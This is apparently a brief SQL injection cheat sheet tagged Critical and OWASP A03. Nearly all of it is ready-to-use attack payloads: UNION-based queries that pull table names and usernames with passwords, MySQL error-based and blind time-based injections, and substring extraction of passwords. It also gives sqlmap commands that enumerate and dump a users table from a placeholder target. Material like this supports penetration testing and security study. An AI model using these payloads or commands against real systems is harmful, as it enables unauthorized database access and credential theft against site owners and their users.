Critical | A03
💉 SQL Injection
🧠 Description
SQL injection occurs when user input is incorporated into SQL queries without proper sanitization, allowing attackers to manipulate database queries and access unauthorized data.
🎯 In-Band SQLi
# Basic detection ' " OR 1=1-- OR '1'='1 # Union-based ' UNION SELECT NULL-- ' UNION SELECT table_name FROM information_schema.tables-- ' UNION SELECT username, password FROM users-- # Error-based (MySQL) ' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))-- ' AND UPDATEXML(1,CONCAT(0x7e,user()),1)--
👻 Blind SQLi
# Boolean-based ' AND 1=1-- ' AND 1=2-- # Time-based ' AND SLEEP(5)-- ' AND (SELECT CASE WHEN 1=1 THEN SLEEP(5) END)-- # Substring extraction ' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
🛠️ Automated Tools
# SQLMap sqlmap -u "http://target.com/?id=1" --batch --dbs sqlmap -u "http://target.com/?id=1" -D database --tables sqlmap -u "http://target.com/?id=1" -D database -T users --dump # Manual exploitation # Identify DB type from error messages # Adjust payloads for MySQL, PostgreSQL, MSSQL, Oracle